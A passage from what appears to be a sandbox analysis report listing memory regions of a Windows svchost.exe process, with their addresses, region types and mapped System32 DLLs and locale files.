0xb40b000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2619 start_va = 0xb40b0c0000 end_va = 0xb40b0c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40b0c0000" filename = "" Region: id = 2620 start_va = 0xb40b0d0000 end_va = 0xb40b0d0fff entry_point = 0x0 region_type = private name = "private_0x000000b40b0d0000" filename = "" Region: id = 2621 start_va = 0xb40b0e0000 end_va = 0xb40b0e0fff entry_point = 0x0 region_type = private name = "private_0x000000b40b0e0000" filename = "" Region: id = 2622 start_va = 0xb40b0f0000 end_va = 0xb40b0f0fff entry_point = 0xb40b0f0000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 2623 start_va = 0xb40b100000 end_va = 0xb40b106fff entry_point = 0x0 region_type = private name = "private_0x000000b40b100000" filename = "" Region: id = 2624 start_va = 0xb40b110000 end_va = 0xb40b1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40b110000" filename = "" Region: id = 2625 start_va = 0xb40b1d0000 end_va = 0xb40b1d0fff entry_point = 0xb40b1d0000 region_type = mapped_file name = "audioendpointbuilder.dll.mui" filename = "\\Windows\\System32\\en-US\\AudioEndpointBuilder.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\audioendpointbuilder.dll.mui") Region: id = 2626 start_va = 0xb40b1e0000 end_va = 0xb40b1e2fff entry_point = 0x0 region_type = private name = "private_0x000000b40b1e0000" filename = "" Region: id = 2627 start_va = 0xb40b1f0000 end_va = 0xb40b1f5fff entry_point = 0xb40b1f0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 2628 start_va = 0xb40b200000 end_va = 0xb40b2fffff entry_point = 0x0 region_type = private name = "private_0x000000b40b200000" filename = "" Region: id = 2629 start_va = 0xb40b300000 end_va = 0xb40b487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40b300000" filename = "" Region: id = 2630 start_va = 0xb40b490000 end_va = 0xb40b610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40b490000" filename = "" Region: id = 2631 start_va = 0xb40b620000 end_va = 0xb40b71ffff entry_point = 0x0 region_type = private name = "private_0x000000b40b620000" filename = "" Region: id = 2632 start_va = 0xb40b720000 end_va = 0xb40b767fff entry_point = 0x0 region_type = private name = "private_0x000000b40b720000" filename = "" Region: id = 2633 start_va = 0xb40b920000 end_va = 0xb40ba1ffff entry_point = 0x0 region_type = private name = "private_0x000000b40b920000" filename = "" Region: id = 2634 start_va = 0xb40baa0000 end_va = 0xb40bb1ffff entry_point = 0x0 region_type = private name = "private_0x000000b40baa0000" filename = "" Region: id = 2635 start_va = 0xb40bb20000 end_va = 0xb40be56fff entry_point = 0xb40bb20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2636 start_va = 0xb40be60000 end_va = 0xb40bedffff entry_point = 0x0 region_type = private name = "private_0x000000b40be60000" filename = "" Region: id = 2637 start_va = 0xb40bee0000 end_va = 0xb40bfdffff entry_point = 0x0 region_type = private name = "private_0x000000b40bee0000" filename = "" Region: id = 2638 start_va = 0xb40c060000 end_va = 0xb40c15ffff entry_point = 0x0 region_type = private name = "private_0x000000b40c060000" filename = "" Region: id = 2639 start_va = 0xb40c160000 end_va = 0xb40c25ffff entry_point = 0x0 region_type = private name = "private_0x000000b40c160000" filename = "" Region: id = 2640 start_va = 0xb40c260000 end_va = 0xb40c290fff entry_point = 0xb40c260000 region_type = mapped_file name = "pfpre_871cf952.mkd" filename = "\\Windows\\Prefetch\\PfPre_871cf952.mkd" (normalized: "c:\\windows\\prefetch\\pfpre_871cf952.mkd") Region: id = 2641 start_va = 0xb40c2a0000 end_va = 0xb40c2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40c2a0000" filename = "" Region: id = 2642 start_va = 0xb40c320000 end_va = 0xb40c326fff entry_point = 0x0 region_type = private name = "private_0x000000b40c320000" filename = "" Region: id = 2643 start_va = 0xb40c360000 end_va = 0xb40c45ffff entry_point = 0x0 region_type = private name = "private_0x000000b40c360000" filename = "" Region: id = 2644 start_va = 0xb40c4a0000 end_va = 0xb40c4a6fff entry_point = 0x0 region_type = private name = "private_0x000000b40c4a0000" filename = "" Region: id = 2645 start_va = 0xb40c500000 end_va = 0xb40c5fffff entry_point = 0x0 region_type = private name = "private_0x000000b40c500000" filename = "" Region: id = 2646 start_va = 0xb40c600000 end_va = 0xb40c6fffff entry_point = 0x0 region_type = private name = "private_0x000000b40c600000" filename = "" Region: id = 2647 start_va = 0xb40c700000 end_va = 0xb50c6fffff entry_point = 0x0 region_type = private name = "private_0x000000b40c700000" filename = "" Region: id = 2648 start_va = 0xb50c890000 end_va = 0xb50c896fff entry_point = 0x0 region_type = private name = "private_0x000000b50c890000" filename = "" Region: id = 2649 start_va = 0xb50c900000 end_va = 0xb50c9fffff entry_point = 0x0 region_type = private name = "private_0x000000b50c900000" filename = "" Region: id = 2650 start_va = 0xb50ca00000 end_va = 0xb50cdfffff entry_point = 0x0 region_type = private name = "private_0x000000b50ca00000" filename = "" Region: id = 2651 start_va = 0xb50ce00000 end_va = 0xb50cf14fff entry_point = 0x0 region_type = private name = "private_0x000000b50ce00000" filename = "" Region: id = 2652 start_va = 0xb50d000000 end_va = 0xb50d0fffff entry_point = 0x0 region_type = private name = "private_0x000000b50d000000" filename = "" Region: id = 2653 start_va = 0xb50d100000 end_va = 0xb50d1fffff entry_point = 0x0 region_type = private name = "private_0x000000b50d100000" filename = "" Region: id = 2654 start_va = 0xb50d3b0000 end_va = 0xb50d4affff entry_point = 0x0 region_type = private name = "private_0x000000b50d3b0000" filename = "" Region: id = 2655 start_va = 0xb50d4b0000 end_va = 0xb50d5affff entry_point = 0x0 region_type = private name = "private_0x000000b50d4b0000" filename = "" Region: id = 2656 start_va = 0xb50d630000 end_va = 0xb50d636fff entry_point = 0x0 region_type = private name = "private_0x000000b50d630000" filename = "" Region: id = 2657 start_va = 0xb50d700000 end_va = 0xb50d7fffff entry_point = 0x0 region_type = private name = "private_0x000000b50d700000" filename = "" Region: id = 2658 start_va = 0xb50d930000 end_va = 0xb50da2ffff entry_point = 0x0 region_type = private name = "private_0x000000b50d930000" filename = "" Region: id = 2659 start_va = 0xb50dc00000 end_va = 0xb50dcfffff entry_point = 0x0 region_type = private name = "private_0x000000b50dc00000" filename = "" Region: id = 2660 start_va = 0xb50dd00000 end_va = 0xb50ddfffff entry_point = 0x0 region_type = private name = "private_0x000000b50dd00000" filename = "" Region: id = 2661 start_va = 0xb50de00000 end_va = 0xb50defffff entry_point = 0x0 region_type = private name = "private_0x000000b50de00000" filename = "" Region: id = 2662 start_va = 0xb50df00000 end_va = 0xb50dffffff entry_point = 0x0 region_type = private name = "private_0x000000b50df00000" filename = "" Region: id = 2663 start_va = 0xb50e000000 end_va = 0xb50e0fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e000000" filename = "" Region: id = 2664 start_va = 0xb50e100000 end_va = 0xb50e1fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e100000" filename = "" Region: id = 2665 start_va = 0xb50e200000 end_va = 0xb50e2fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e200000" filename = "" Region: id = 2666 start_va = 0xb50e300000 end_va = 0xb50e3fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e300000" filename = "" Region: id = 2667 start_va = 0xb50e400000 end_va = 0xb50e4fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e400000" filename = "" Region: id = 2668 start_va = 0xb50e500000 end_va = 0xb50e5fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e500000" filename = "" Region: id = 2669 start_va = 0xb50e700000 end_va = 0xb50e7fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e700000" filename = "" Region: id = 2670 start_va = 0xb50e800000 end_va = 0xb50e8fffff entry_point = 0x0 region_type = private name = "private_0x000000b50e800000" filename = "" Region: id = 2671 start_va = 0xb50ea00000 end_va = 0xb50eafffff entry_point = 0x0 region_type = private name = "private_0x000000b50ea00000" filename = "" Region: id = 2672 start_va = 0xb50eb00000 end_va = 0xb50ebfffff entry_point = 0x0 region_type = private name = "private_0x000000b50eb00000" filename = "" Region: id = 2673 start_va = 0xb50ec00000 end_va = 0xb50ecfffff entry_point = 0x0 region_type = private name = "private_0x000000b50ec00000" filename = "" Region: id = 2674 start_va = 0xb50ed00000 end_va = 0xb50edfffff entry_point = 0x0 region_type = private name = "private_0x000000b50ed00000" filename = "" Region: id = 2675 start_va = 0xb50ee00000 end_va = 0xb50eefffff entry_point = 0x0 region_type = private name = "private_0x000000b50ee00000" filename = "" Region: id = 2676 start_va = 0xb50ef00000 end_va = 0xb50effffff entry_point = 0x0 region_type = private name = "private_0x000000b50ef00000" filename = "" Region: id = 2677 start_va = 0xb50f000000 end_va = 0xb50f0fffff entry_point = 0x0 region_type = private name = "private_0x000000b50f000000" filename = "" Region: id = 2678 start_va = 0xb50f100000 end_va = 0xb50f1fffff entry_point = 0x0 region_type = private name = "private_0x000000b50f100000" filename = "" Region: id = 2679 start_va = 0xb50f200000 end_va = 0xb50f400fff entry_point = 0x0 region_type = private name = "private_0x000000b50f200000" filename = "" Region: id = 2680 start_va = 0xb50f410000 end_va = 0xb50f5e0fff entry_point = 0x0 region_type = private name = "private_0x000000b50f410000" filename = "" Region: id = 2681 start_va = 0x7df5fff00000 end_va = 0x7ff5ffefffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff00000" filename = "" Region: id = 2682 start_va = 0x7ff787826000 end_va = 0x7ff787827fff entry_point = 0x0 region_type = private name = "private_0x00007ff787826000" filename = "" Region: id = 2683 start_va = 0x7ff787828000 end_va = 0x7ff787829fff entry_point = 0x0 region_type = private name = "private_0x00007ff787828000" filename = "" Region: id = 2684 start_va = 0x7ff78782e000 end_va = 0x7ff78782ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78782e000" filename = "" Region: id = 2685 start_va = 0x7ff787830000 end_va = 0x7ff787831fff entry_point = 0x0 region_type = private name = "private_0x00007ff787830000" filename = "" Region: id = 2686 start_va = 0x7ff787834000 end_va = 0x7ff787835fff entry_point = 0x0 region_type = private name = "private_0x00007ff787834000" filename = "" Region: id = 2687 start_va = 0x7ff787836000 end_va = 0x7ff787837fff entry_point = 0x0 region_type = private name = "private_0x00007ff787836000" filename = "" Region: id = 2688 start_va = 0x7ff78783a000 end_va = 0x7ff78783bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78783a000" filename = "" Region: id = 2689 start_va = 0x7ff78783c000 end_va = 0x7ff78783dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78783c000" filename = "" Region: id = 2690 start_va = 0x7ff787840000 end_va = 0x7ff78793ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787840000" filename = "" Region: id = 2691 start_va = 0x7ff787940000 end_va = 0x7ff787962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787940000" filename = "" Region: id = 2692 start_va = 0x7ff787963000 end_va = 0x7ff787964fff entry_point = 0x0 region_type = private name = "private_0x00007ff787963000" filename = "" Region: id = 2693 start_va = 0x7ff787967000 end_va = 0x7ff787968fff entry_point = 0x0 region_type = private name = "private_0x00007ff787967000" filename = "" Region: id = 2694 start_va = 0x7ff787969000 end_va = 0x7ff78796afff entry_point = 0x0 region_type = private name = "private_0x00007ff787969000" filename = "" Region: id = 2695 start_va = 0x7ff78796b000 end_va = 0x7ff78796cfff entry_point = 0x0 region_type = private name = "private_0x00007ff78796b000" filename = "" Region: id = 2696 start_va = 0x7ff78796d000 end_va = 0x7ff78796efff entry_point = 0x0 region_type = private name = "private_0x00007ff78796d000" filename = "" Region: id = 2697 start_va = 0x7ff78796f000 end_va = 0x7ff78796ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78796f000" filename = "" Region: id = 2698 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2699 start_va = 0x7ffae0030000 end_va = 0x7ffae00cdfff entry_point = 0x7ffae0030000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2700 start_va = 0x7ffae5cf0000 end_va = 0x7ffae5cfafff entry_point = 0x7ffae5cf0000 region_type = mapped_file name = "systemeventsbrokerclient.dll" filename = "\\Windows\\System32\\SystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerclient.dll") Region: id = 2701 start_va = 0x7ffae60c0000 end_va = 0x7ffae6117fff entry_point = 0x7ffae60c0000 region_type = mapped_file name = "ncbservice.dll" filename = "\\Windows\\System32\\ncbservice.dll" (normalized: "c:\\windows\\system32\\ncbservice.dll") Region: id = 2702 start_va = 0x7ffae8710000 end_va = 0x7ffae8752fff entry_point = 0x7ffae8710000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 2703 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2704 start_va = 0x7ffaeaf30000 end_va = 0x7ffaeaf4cfff entry_point = 0x7ffaeaf30000 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 2705 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2706 start_va = 0x7ffaeb660000 end_va = 0x7ffaeb681fff entry_point = 0x7ffaeb660000 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 2707 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2708 start_va = 0x7ffaebb60000 end_va = 0x7ffaebc72fff entry_point = 0x7ffaebb60000 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 2709 start_va = 0x7ffaebcf0000 end_va = 0x7ffaebd6ffff entry_point = 0x7ffaebcf0000 region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 2710 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2711 start_va = 0x7ffaecef0000 end_va = 0x7ffaecf0cfff entry_point = 0x7ffaecef0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 2712 start_va = 0x7ffaed040000 end_va = 0x7ffaed04ffff entry_point = 0x7ffaed040000 region_type = mapped_file name = "pcadm.dll" filename = "\\Windows\\System32\\pcadm.dll" (normalized: "c:\\windows\\system32\\pcadm.dll") Region: id = 2713 start_va = 0x7ffaed130000 end_va = 0x7ffaed13efff entry_point = 0x7ffaed130000 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 2714 start_va = 0x7ffaef890000 end_va = 0x7ffaef898fff entry_point = 0x7ffaef890000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2715 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2716 start_va = 0x7ffaf0620000 end_va = 0x7ffaf0652fff entry_point = 0x7ffaf0620000 region_type = mapped_file name = "wudfplatform.dll" filename = "\\Windows\\System32\\WUDFPlatform.dll" (normalized: "c:\\windows\\system32\\wudfplatform.dll") Region: id = 2717 start_va = 0x7ffaf0660000 end_va = 0x7ffaf067afff entry_point = 0x7ffaf0660000 region_type = mapped_file name = "wudfsvc.dll" filename = "\\Windows\\System32\\WUDFSvc.dll" (normalized: "c:\\windows\\system32\\wudfsvc.dll") Region: id = 2718 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2719 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2720 start_va = 0x7ffaf1250000 end_va = 0x7ffaf1299fff entry_point = 0x7ffaf1250000 region_type = mapped_file name = "audioendpointbuilder.dll" filename = "\\Windows\\System32\\AudioEndpointBuilder.dll" (normalized: "c:\\windows\\system32\\audioendpointbuilder.dll") Region: id = 2721 start_va = 0x7ffaf1610000 end_va = 0x7ffaf161bfff entry_point = 0x7ffaf1610000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2722 start_va = 0x7ffaf1640000 end_va = 0x7ffaf16fffff entry_point = 0x7ffaf1640000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2723 start_va = 0x7ffaf17b0000 end_va = 0x7ffaf17c6fff entry_point = 0x7ffaf17b0000 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 2724 start_va = 0x7ffaf17d0000 end_va = 0x7ffaf1870fff entry_point = 0x7ffaf17d0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 2725 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2726 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2727 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 2728 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2729 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2730 start_va = 0x7ffaf2c40000 end_va = 0x7ffaf2c7efff entry_point = 0x7ffaf2c40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 2731 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2732 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2733 start_va = 0x7ffaf36d0000 end_va = 0x7ffaf36ebfff entry_point = 0x7ffaf36d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2734 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2735 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2736 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2737 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2738 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2739 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2740 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2741 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2742 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2743 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2744 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2745 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2746 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2747 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2748 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2749 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2750 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2751 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2752 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2753 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2754 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2755 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2756 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2757 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2758 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2759 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2760 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2761 start_va = 0x7ffaf7250000 end_va = 0x7ffaf72befff entry_point = 0x7ffaf7250000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 2762 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2763 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2764 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2765 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 